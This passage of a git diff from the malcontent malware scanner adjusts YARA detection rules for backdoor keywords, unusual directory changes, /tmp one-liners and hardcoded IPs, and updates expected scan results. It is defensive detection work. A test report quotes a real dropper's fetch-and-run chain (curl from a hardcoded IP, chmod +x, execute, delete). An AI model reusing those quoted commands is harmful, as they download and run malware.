"kallsyms_lookup_name" fullword $not_bpf = "BPF_FUNC_kallsyms_lookup_name" + $not_linux_src = "GPL-2.0 WITH Linux" + $not_include = "#define " condition: - $ref and none of ($not*) + filesize < 1MB and $ref and none of ($not*) } diff --git a/rules/persist/bash.yara b/rules/persist/bash.yara index bb45dec5..242e23e1 100644 --- a/rules/persist/bash.yara +++ b/rules/persist/bash.yara @@ -24,6 +24,8 @@ rule bash_logout_persist : high { strings: $ref = ".bash_logout" $not_bash = "POSIXLY_CORRECT" + $not_comment = "# ~/.bash_logout" + $not_clear = "/usr/bin/clear_console" condition: filesize < 2097152 and any of ($ref*) and none of ($not*) } diff --git a/rules/process/chdir-unusual.yara b/rules/process/chdir-unusual.yara index aa5371e3..efa3c90d 100644 --- a/rules/process/chdir-unusual.yara +++ b/rules/process/chdir-unusual.yara @@ -1,26 +1,72 @@ +rule cd_tmp : medium { + meta: + description = "changes the current working directory to /tmp" + strings: + $d_tmp = "cd /tmp" + condition: + $d_tmp +} + +rule cd_usr : medium { + meta: + description = "changes the current working directory to /usr" + strings: + $d_usr = /cd \/usr[\/\w\.]{0,16}/ + condition: + $d_usr +} -rule unusual_cd_val : high { +rule cd_mnt : medium { meta: - description = "changes to an unusual system directory" - hash_2023_Py_Trojan_NecroBot_0e60 = "0e600095a3c955310d27c08f98a012720caff698fe24303d7e0dcb4c5e766322" - hash_2023_usr_adxintrin_b = "a51a4ddcd092b102af94139252c898d7c1c48f322bae181bd99499a79c12c500" - hash_2023_spirit = "26ba215bcd5d8a9003a904b0eac7dc10054dba7bea9a708668a5f6106fd73ced" + description = "changes the current working directory to /mnt" strings: $d_mnt = "cd /mnt" - $d_root = "cd /root" + condition: + any of ($d*) +} + +rule cd_bin : high { + meta: + description = "changes the current working directory to bin directory" + strings: $d_bin = "cd /bin" - $d_tmp = "cd /tmp" - $d_usr = /cd \/usr[\/\w\.]{0,16}/ + $d_sbin = "cd /sbin" + $d_usr_bin = "cd /usr/bin" + $d_usr_sbin = "cd /usr/sbin" + condition: + any of ($d*) +} + +rule cd_root : high { + meta: + description = "changes the current working directory to /root" + strings: + $d_root = "cd /root" + condition: + any of ($d*) +} + +rule cd_var : medium { + meta: + description = "changes the current working directory to /var" + strings: + $d_usr = /cd \/var[\/\w\.]{0,16}/ + condition: + $d_usr +} + +rule cd_var_subdir : high { + meta: + description = "changes current working directory to /var/{log,run,tmp}" + strings: $d_var_log = "cd /var/log" $d_var_run = "cd /var/run" $d_var_tmp = "cd /var/tmp" - $not_usr_src = "cd /usr/src" - $not_usr_include = "cd /usr/include" condition: - any of ($d*) and none of ($not*) + any of ($d*) } -rule unusual_cd_val_obsessive : critical { +rule cd_val_obsessive : critical { meta: description = "changes directory to multiple unusual locations" strings: @@ -28,14 +74,15 @@ rule unusual_cd_val_obsessive : critical { $d_root = "cd /root" $d_bin = "cd /bin" $d_tmp = "cd /tmp" + $d_dev = "cd /dev" $d_slash = /cd \/[\; \|\&]/ fullword condition: 3 of them } -rule unusual_cd_dev_val : high { +rule unusual_cd_dev : high { meta: - description = "changes to an unusual system directory" + description = "changes the current working directory to /dev" hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" diff --git a/rules/procfs/self-cmdline.yara b/rules/procfs/self-cmdline.yara index f65f3357..399712d2 100644 --- a/rules/procfs/self-cmdline.yara +++ b/rules/procfs/self-cmdline.yara @@ -1,5 +1,5 @@ -rule proc_self_cmdline : medium { +rule proc_self_cmdline : medium linux { meta: description = "gets process command-line" pledge = "stdio" diff --git a/rules/ref/ip_port.yara b/rules/ref/ip_port.yara index fadcac2e..1ec73f08 100644 --- a/rules/ref/ip_port.yara +++ b/rules/ref/ip_port.yara @@ -12,6 +12,7 @@ rule hardcoded_ip_port : high { $not_meta = "169.254.169.254:80" $not_vnc = "10.10.10.10:5900" $not_azure_pgsql = "20.66.25.58:5432" + $not_wireguard = "127.212.121.99:999" $not_test = "def test_" fullword condition: any of ($ip*) and none of ($not*) @@ -41,6 +42,7 @@ rule logfile : override { http_hardcoded_ip = "medium" exploiter = "medium" http_ip_url_with_exe = "medium" + filetypes = "txt,log,json" strings: $timestamp = "@timestamp" condition: diff --git a/rules/ref/path/etc-initd.yara b/rules/ref/path/etc-initd.yara index 2fc22686..b561d5fe 100644 --- a/rules/ref/path/etc-initd.yara +++ b/rules/ref/path/etc-initd.yara @@ -1,19 +1,20 @@ -rule etc_initd : medium { +rule etc_initd : medium linux { meta: description = "references /etc/init.d" strings: $ref = /etc\/init\.d\/[\w\/\.]{0,32}/ fullword condition: - any of them + filesize < 50MB and any of them } -rule etc_initd_short_file : high { +rule etc_initd_short_file : high linux { meta: description = "references short filename within /etc/init.d" strings: - $ref = /etc\/init\.d\/[\w\.]{2,4}/ fullword - $not_sshd = "/etc/init.d/sshd" + $ref = /etc\/init\.d\/[\w\.]{1,3}/ fullword $not_rcd = "/etc/init.d/rc.d" + $not_init = "SCRIPTNAME=/etc/init.d/" + $header = "### BEGIN INIT INFO" condition: - any of them and none of ($not*) + filesize < 50MB and $ref and none of ($not*) and not $header in (1..128) } diff --git a/rules/ref/site/http-ip.yara b/rules/ref/site/http-ip.yara index e162a7f9..178a10d6 100644 --- a/rules/ref/site/http-ip.yara +++ b/rules/ref/site/http-ip.yara @@ -11,6 +11,7 @@ rule http_hardcoded_ip : high exfil { $not_11 = "http://11.11.11" $not_192 = "http://192.168" $not_169 = "http://169.254" + $not_aria = "http://210.104.33.10/ARIA/" condition: $ipv4 and none of ($not*) } diff --git a/rules/ref/words/backdoor.yara b/rules/ref/words/backdoor.yara index 5a152bbd..6e87ba2c 100644 --- a/rules/ref/words/backdoor.yara +++ b/rules/ref/words/backdoor.yara @@ -1,3 +1,14 @@ +private rule wordlist { + strings: + $scorpion = "scorpion" + $superman = "superman" + $porsche = "porsche" + $cardinal = "cardinal" + $wombat = "wombat" + condition: + filesize < 100MB and 3 of them +} + rule backdoor : high { meta: @@ -6,10 +17,42 @@ rule backdoor : high { hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30" hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" strings: - $ref = /[a-zA-Z\-_ ]{0,16}backdoor[a-zA-Z\-_ ]{0,16}/ fullword + $ref = /[a-zA-Z\-_ ]{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword + condition: + filesize < 40MB and any of them and not wordlist +} + +rule backdoor_caps : high { + meta: + description = "References a 'BACKDOOR'" + hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2" + hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30" + hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" + strings: $ref2 = /[a-zA-Z\-_ ]{0,16}BACKDOOR[a-zA-Z\-_ ]{0,16}/ fullword - $ref3 = /[a-zA-Z\-_ ]{0,16}Backdoor[a-zA-Z\-_ ]{0,16}/ - $ref4 = /[a-zA-Z\-_ ]{0,16}backd00r[a-zA-Z\-_ ]{0,16}/ condition: - any of them + filesize < 40MB and any of them and not wordlist +} + +rule backdoor_leet : critical { + meta: + description = "References a 'backd00r'" + hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2" + hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30" + hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" + strings: + $ref4 = /[a-zA-Z\-_ ]{0,16}[bB][a4]ckd00r[a-zA-Z\-_ ]{0,16}/ + condition: + filesize < 100MB and any of them and not wordlist +} + +rule include_header : override linux { + meta: + description = "include header" + backdoor = "medium" + filetypes = "h" + strings: + $re = /\#define [A-Z0-9_]+_H/ fullword + condition: + filesize < 100KB and any of them } diff --git a/rules/shell/tmp_semicolon.yara b/rules/shell/tmp_semicolon.yara index 12ab4845..f4fbc63c 100644 --- a/rules/shell/tmp_semicolon.yara +++ b/rules/shell/tmp_semicolon.yara @@ -7,8 +7,19 @@ rule semicolon_short_tmp : high { hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0" strings: $tmp_before = /[\w\/ \-\;]{0,32} \/tmp\/[a-z]{1,5} {0,2};/ - $var_tmp_before = /[\w\/ \-\;]{0,32} \/var\/tmp\/[a-z]{1,5} {0,2};/ $tmp_after = /[\w\/ \-]{0,32}; {0,2}\/tmp\/[a-z]{1,5}[\w\/ \-\&\;]{0,32}/ + condition: + any of them +} + +rule semicolon_short_var_tmp : high { + meta: + description = "unusual one-liners involving /var/tmp" + hash_2023_Unix_Coinminer_Xanthe_7ea1 = "7ea112aadebb46399a05b2f7cc258fea02f55cf2ae5257b331031448f15beb8f" + hash_2023_Unix_Dropper_Mirai_0e91 = "0e91c06bb84630aba38e9c575576b46240aba40f36e6142c713c9d63a11ab4bb" + hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0" + strings: + $var_tmp_before = /[\w\/ \-\;]{0,32} \/var\/tmp\/[a-z]{1,5} {0,2};/ $var_tmp_after = /[\w\/ \-]{0,32}; {0,2}\/var\/tmp\/[a-z]{1,5}[\w\/ \-\&\;]{0,32}/ condition: any of them diff --git a/test_data/javascript/clean/203.b7219352.chunk.js.simple b/test_data/javascript/clean/203.b7219352.chunk.js.simple new file mode 100644 index 00000000..e386ed08 --- /dev/null +++ b/test_data/javascript/clean/203.b7219352.chunk.js.simple @@ -0,0 +1,55 @@ +# javascript/clean/203.b7219352.chunk.js: medium +combo/degrader/infection: medium +compression/bzip2: low +compression/gzip: low +encoding/base64: low +encoding/json/encode: low +env/HOME: low +env/LANG: low +env/SHELL: low +env/TEMP: low +env/TERM: low +env/USER: low +exec/cmd: medium +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/file/write: low +fs/mount: low +fs/node/create: low +fs/permission/modify: medium +fs/quota/manipulate: low +fs/swap/on: low +fs/symlink/resolve: low +fs/unmount: low +kernel/platform: low +net/dns/txt: low +net/download: medium +net/http/cookies: medium +net/http/form/upload: medium +net/http/post: medium +net/interface/list: medium +net/mac/address: medium +net/sendfile: low +net/sftp: medium +net/socket/listen: low +net/socket/send: low +net/ssh: medium +net/stat: medium +net/upload: medium +net/wireless: low +persist/crontab: medium +persist/pid_file: medium +process/chroot: low +process/username/get: medium +ref/daemon: medium +ref/program/powershell: medium +ref/program/sudo: medium +ref/site/url: low +ref/words/agent: medium +ref/words/heartbeat: medium +ref/words/intercept: medium +ref/words/password: low +ref/words/plugin: low +security_controls/linux/selinux: medium +techniques/code_eval: medium diff --git a/test_data/javascript/clean/3937.844b09f50594ca2613b4.js.map.simple b/test_data/javascript/clean/3937.844b09f50594ca2613b4.js.map.simple new file mode 100644 index 00000000..487e1684 --- /dev/null +++ b/test_data/javascript/clean/3937.844b09f50594ca2613b4.js.map.simple @@ -0,0 +1,8 @@ +# javascript/clean/3937.844b09f50594ca2613b4.js.map: medium +fs/directory/remove: low +fs/file/copy: medium +fs/file/delete: medium +net/fetch: medium +obfuscation/powershell/bxor: medium +ref/program/powershell: medium +ref/site/url: low diff --git a/test_data/javascript/clean/bash.js.simple b/test_data/javascript/clean/bash.js.simple new file mode 100644 index 00000000..3c667b57 --- /dev/null +++ b/test_data/javascript/clean/bash.js.simple @@ -0,0 +1,26 @@ +# javascript/clean/bash.js: medium +combo/degrader/infection: medium +combo/recon/system_network: medium +compression/bzip2: low +compression/gzip: low +env/SHELL: low +env/TERM: low +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/node/create: low +fs/permission/modify: medium +fs/quota/manipulate: low +fs/swap/on: low +fs/unmount: low +kernel/platform: low +net/interface/list: medium +net/sftp: medium +net/ssh: medium +net/stat: medium +persist/crontab: medium +process/chroot: low +process/username/get: medium +ref/program/sudo: medium +ref/site/url: low +security_controls/linux/selinux: medium diff --git a/test_data/javascript/clean/frequency_lists.js.simple b/test_data/javascript/clean/frequency_lists.js.simple index 69d7dced..eb030275 100644 --- a/test_data/javascript/clean/frequency_lists.js.simple +++ b/test_data/javascript/clean/frequency_lists.js.simple @@ -18,7 +18,6 @@ process/username/get: medium ref/daemon: medium ref/program/minecraft: medium ref/words/agent: medium -ref/words/backdoor: high ref/words/dropper: medium ref/words/exploit: medium ref/words/heartbeat: medium diff --git a/test_data/javascript/clean/index.js.map.simple b/test_data/javascript/clean/index.js.map.simple new file mode 100644 index 00000000..3acb1df3 --- /dev/null +++ b/test_data/javascript/clean/index.js.map.simple @@ -0,0 +1,11 @@ +# javascript/clean/index.js.map: medium +crypto/aes: low +encoding/base64: low +encoding/json/decode: low +encoding/json/encode: low +net/http/auth: low +net/http/form/upload: medium +net/http/post: medium +net/url: low +ref/site/url: low +ref/words/ransomware/lvt: medium diff --git a/test_data/javascript/clean/prism-bash.js.simple b/test_data/javascript/clean/prism-bash.js.simple new file mode 100644 index 00000000..3e42e7d0 --- /dev/null +++ b/test_data/javascript/clean/prism-bash.js.simple @@ -0,0 +1,26 @@ +# javascript/clean/prism-bash.js: medium +combo/degrader/infection: medium +combo/recon/system_network: medium +compression/bzip2: low +compression/gzip: low +env/SHELL: low +env/TERM: low +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/node/create: low +fs/permission/modify: medium +fs/quota/manipulate: low +fs/swap/on: low +fs/unmount: low +kernel/platform: low +net/interface/list: medium +net/sftp: medium +net/ssh: medium +net/stat: medium +persist/crontab: medium +process/chroot: low +process/username/get: medium +ref/program/sudo: medium +ref/site/url: low +security_controls/linux/selinux: medium diff --git a/test_data/javascript/clean/prism-bash.min.js.simple b/test_data/javascript/clean/prism-bash.min.js.simple new file mode 100644 index 00000000..cb129825 --- /dev/null +++ b/test_data/javascript/clean/prism-bash.min.js.simple @@ -0,0 +1,26 @@ +# javascript/clean/prism-bash.min.js: medium +combo/degrader/infection: medium +combo/recon/system_network: medium +compression/bzip2: low +compression/gzip: low +env/SHELL: low +env/TERM: low +fd/multiplex: low +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/node/create: low +fs/permission/modify: medium +fs/quota/manipulate: low +fs/swap/on: low +fs/unmount: low +kernel/platform: low +net/interface/list: medium +net/sftp: medium +net/ssh: medium +net/stat: medium +persist/crontab: medium +process/chroot: low +process/username/get: medium +ref/program/sudo: medium +security_controls/linux/selinux: medium diff --git a/test_data/javascript/clean/scripts.c88fecd373e21509.js.simple b/test_data/javascript/clean/scripts.c88fecd373e21509.js.simple new file mode 100644 index 00000000..c8e1e4d5 --- /dev/null +++ b/test_data/javascript/clean/scripts.c88fecd373e21509.js.simple @@ -0,0 +1,34 @@ +# javascript/clean/scripts.c88fecd373e21509.js: medium +combo/degrader/infection: medium +combo/recon/system_network: medium +compression/bzip2: low +compression/gzip: low +encoding/json/decode: low +encoding/json/encode: low +env/SHELL: low +env/TERM: low +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/mount: low +fs/node/create: low +fs/permission/modify: medium +fs/quota/manipulate: low +fs/swap/on: low +fs/unmount: low +kernel/platform: low +net/interface/list: medium +net/sftp: medium +net/ssh: medium +net/stat: medium +net/url: low +obfuscation/js/high_entropy: medium +persist/crontab: medium +process/chroot: low +process/username/get: medium +ref/program/powershell: medium +ref/program/sudo: medium +ref/site/url: low +ref/words/plugin: low +security_controls/linux/selinux: medium +techniques/code_eval: medium diff --git a/test_data/javascript/clean/securityDashboards.plugin.js.simple b/test_data/javascript/clean/securityDashboards.plugin.js.simple index 516a65af..41f72421 100644 --- a/test_data/javascript/clean/securityDashboards.plugin.js.simple +++ b/test_data/javascript/clean/securityDashboards.plugin.js.simple @@ -1,4 +1,4 @@ -# javascript/clean/securityDashboards.plugin.js: critical +# javascript/clean/securityDashboards.plugin.js: high 3P/threat_hunting/crowbar: medium 3P/threat_hunting/hijacker: medium 3P/threat_hunting/johntheripper: medium @@ -29,7 +29,6 @@ ref/daemon: medium ref/program/minecraft: medium ref/site/url: low ref/words/agent: medium -ref/words/backdoor: high ref/words/dropper: medium ref/words/exploit: medium ref/words/heartbeat: medium diff --git a/test_data/javascript/clean/zxcvbn.js.simple b/test_data/javascript/clean/zxcvbn.js.simple index 6b897798..bc9ddd9f 100644 --- a/test_data/javascript/clean/zxcvbn.js.simple +++ b/test_data/javascript/clean/zxcvbn.js.simple @@ -20,7 +20,6 @@ ref/daemon: medium ref/path/relative: medium ref/program/minecraft: medium ref/words/agent: medium -ref/words/backdoor: high ref/words/dropper: medium ref/words/exploit: medium ref/words/heartbeat: medium diff --git a/test_data/linux/2023.Kinsing/install.sh.simple b/test_data/linux/2023.Kinsing/install.sh.simple index 76eb1e32..068e9f41 100644 --- a/test_data/linux/2023.Kinsing/install.sh.simple +++ b/test_data/linux/2023.Kinsing/install.sh.simple @@ -8,8 +8,8 @@ admin/logs/syslog: medium admin/package/install: medium combo/backdoor/iptables: medium combo/backdoor/kill_rm: medium -combo/critical_paths: medium combo/degrader/infection: critical +combo/degrader/linux_paths: high combo/degrader/selinux_firewall: high combo/degrader/ufw: high combo/dropper/http_ip_temp: critical diff --git a/test_data/linux/2024.Darkcracks/darkcracks.sh.md b/test_data/linux/2024.Darkcracks/darkcracks.sh.md index 1a248728..9aaa418a 100644 --- a/test_data/linux/2024.Darkcracks/darkcracks.sh.md +++ b/test_data/linux/2024.Darkcracks/darkcracks.sh.md @@ -5,7 +5,7 @@ | CRITICAL | [combo/dropper/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/dropper/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | | CRITICAL | [evasion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | -| CRITICAL | [process/chdir/unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir-unusual.yara#unusual_cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [process/chdir/unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | HIGH | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#hardcoded_ip_port) | hardcoded IP:port destination | [179.191.68.85:82](https://github.com/search?q=179.191.68.85%3A82&type=code) | | HIGH | [ref/site/http/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/http-ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Ex](http://179.191.68.85:82/vendor/sebastian/diff/src/Ex) | | MEDIUM | [fs/file/make_executable](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-make_executable.yara#chmod_executable_shell) | makes file executable | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code) | diff --git a/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index bcfb9165..a1272979 100644 --- a/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -2,6 +2,7 @@ 3P/elastic/threat: high combo/backdoor/kill_rm: medium combo/botnet/systemctl: critical +combo/degrader/linux_paths: high combo/dropper/shell: medium combo/stealer/linux_server: high combo/stealer/ssh: high diff --git a/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple index e1e931de..cbf49731 100644 --- a/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple +++ b/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple @@ -18,7 +18,6 @@ env/HOME: low evasion/base64/commands: high evasion/base64/http: high evasion/elf/sus_header: critical -evasion/fake/process: critical exfil/discord: critical fs/file/delete: low fs/file/make_executable: high diff --git a/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple index 96ece9d4..39c126a3 100644 --- a/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -8,7 +8,6 @@ archives/unarchive: medium archives/zip: medium combo/backdoor/kill_rm: medium combo/backdoor/net_exec: medium -combo/critical_paths: medium combo/exploit/overflow/shellcode: high combo/exploit/pwnkit: critical combo/net/host_port: medium @@ -107,7 +106,7 @@ net/websocket: medium persist/crontab: medium persist/pid_file: medium process/chdir: low -process/chdir/unusual: high +process/chdir/unusual: medium process/chroot: low process/groupid/set: low process/groups/set: low diff --git a/test_data/linux/2024.kworker_pretenders/gafgyt.simple b/test_data/linux/2024.kworker_pretenders/gafgyt.simple index 013af2a1..70731dfa 100644 --- a/test_data/linux/2024.kworker_pretenders/gafgyt.simple +++ b/test_data/linux/2024.kworker_pretenders/gafgyt.simple @@ -1,7 +1,7 @@ # linux/2024.kworker_pretenders/gafgyt: critical 3P/elastic/mirai: critical 3P/threat_hunting/base64: medium -combo/critical_paths: medium +combo/degrader/linux_paths: high encoding/base64: low evasion/base64/eval: high evasion/base64/external: medium diff --git a/test_data/linux/2024.medusa/rkload.simple b/test_data/linux/2024.medusa/rkload.simple index 9489002c..bc60507a 100644 --- a/test_data/linux/2024.medusa/rkload.simple +++ b/test_data/linux/2024.medusa/rkload.simple @@ -1,6 +1,7 @@ # linux/2024.medusa/rkload: critical 3P/elastic/orbit: critical admin/system_directories: medium +combo/degrader/linux_paths: high dylib/address/check: low dylib/symbol/address: medium env/GCONV_PATH: low diff --git a/test_data/linux/clean/busybox.simple b/test_data/linux/clean/busybox.simple new file mode 100644 index 00000000..bf7e33a0 --- /dev/null +++ b/test_data/linux/clean/busybox.simple @@ -0,0 +1,90 @@ +# linux/clean/busybox: high +admin/logs/current_logins: medium +combo/degrader/infection: medium +combo/degrader/linux_paths: high +combo/net/raw_flooder: medium +combo/net/scan_tool: medium +compression/bzip2: low +compression/gzip: low +encoding/base64: low +env/HOME: low +env/LANG: low +env/LD_LIBRARY_PATH: low +env/SHELL: low +env/TERM: low +env/TMPDIR: low +env/USER: low +exec/program: medium +exec/program/background: low +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/file/copy: medium +fs/file/delete: low +fs/file/times/set: medium +fs/file/truncate: low +fs/link/read: low +fs/lock/update: low +fs/mount: low +fs/mounts/read: medium +fs/node/create: low +fs/permission/chown: low +fs/permission/modify: medium +fs/symlink/resolve: low +fs/tempdir: low +fs/tempdir/create: low +fs/tempfile/create: low +fs/watch: low +group/lookup: medium +kernel/cpu/info: low +kernel/hostname/set: low +kernel/pivot_root: low +kernel/platform: low +kernel/ptrace: medium +kernel/sysinfo: medium +net/hostname/resolve: low +net/hostport/parse: low +net/icmp: medium +net/interface/get: low +net/ip/multicast/send: low +net/ip/parse: medium +net/ip/string: medium +net/raw_sockets: medium +net/socket/local/address: low +net/socket/receive: low +net/socket/send: low +net/stat: medium +net/tcp/state_tracker: medium +process/chdir: low +process/chroot: low +process/create: low +process/executable_path: low +process/find: medium +process/groupid/set: low +process/groups/set: low +process/namespace/set: low +process/parent_pid/get: low +process/userid/set: low +process/username/get: medium +procfs/arbitrary/pid: medium +procfs/meminfo: medium +procfs/mounts: medium +procfs/stat: medium +random/insecure: low +ref/daemon: medium +ref/ip_port: medium +ref/path/etc: low +ref/path/home: medium +ref/path/tmp: medium +ref/path/usr/bin: low +ref/path/usr/sbin: low +ref/path/var: low +ref/path/var/log: medium +ref/site/url: low +ref/words/password: low +secrets/gshadow: medium +secrets/shadow: medium +shell/exec: medium +time/clock/set: low +tty/parameters/get: medium +tty/pathname: medium diff --git a/test_data/linux/clean/chezmoi.simple b/test_data/linux/clean/chezmoi.simple index 85244232..8c370f38 100644 --- a/test_data/linux/clean/chezmoi.simple +++ b/test_data/linux/clean/chezmoi.simple @@ -139,7 +139,6 @@ ref/site/download: medium ref/site/github_api: low ref/site/http/dynamic: medium ref/site/url: low -ref/words/backdoor: high ref/words/dropper: medium ref/words/exclamation: medium ref/words/exploit: medium diff --git a/test_data/linux/clean/chrome.simple b/test_data/linux/clean/chrome.simple index 281bbbf9..8790bdae 100644 --- a/test_data/linux/clean/chrome.simple +++ b/test_data/linux/clean/chrome.simple @@ -2,7 +2,6 @@ 3P/threat_hunting/metasploit: medium 3P/threat_hunting/proxmark: medium archives/zip: medium -combo/critical_paths: medium combo/net/tunnel_proxy: medium compression/bzip2: low compression/gzip: low diff --git a/test_data/linux/clean/clickhouse.simple b/test_data/linux/clean/clickhouse.simple index e4ae2a5a..63d0253d 100644 --- a/test_data/linux/clean/clickhouse.simple +++ b/test_data/linux/clean/clickhouse.simple @@ -7,7 +7,6 @@ admin/package/install: medium admin/shutdown: medium builtin/openssl: medium cloud/google/metadata: low -combo/critical_paths: medium combo/dropper/shell: medium combo/miner/argon2d_numa_self: high combo/net/tunnel_proxy: medium @@ -68,7 +67,6 @@ fs/mounts/read: medium fs/node/create: low fs/permission/chown: low fs/permission/modify: medium -fs/permission/modify/dangerous: medium fs/symlink/resolve: low fs/tempdir: low fs/tempdir/create: low @@ -82,7 +80,6 @@ kernel/acct: low kernel/cpu/info: low kernel/dev/block/device: medium kernel/hostname/get: low -kernel/module/load: medium kernel/netlink: low kernel/opencl: medium kernel/platform: low diff --git a/test_data/linux/clean/code-oss.md b/test_data/linux/clean/code-oss.md index 5b6851e3..50932184 100644 --- a/test_data/linux/clean/code-oss.md +++ b/test_data/linux/clean/code-oss.md @@ -6,7 +6,6 @@ | MEDIUM | [3P/threat_hunting/google/remote/desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | 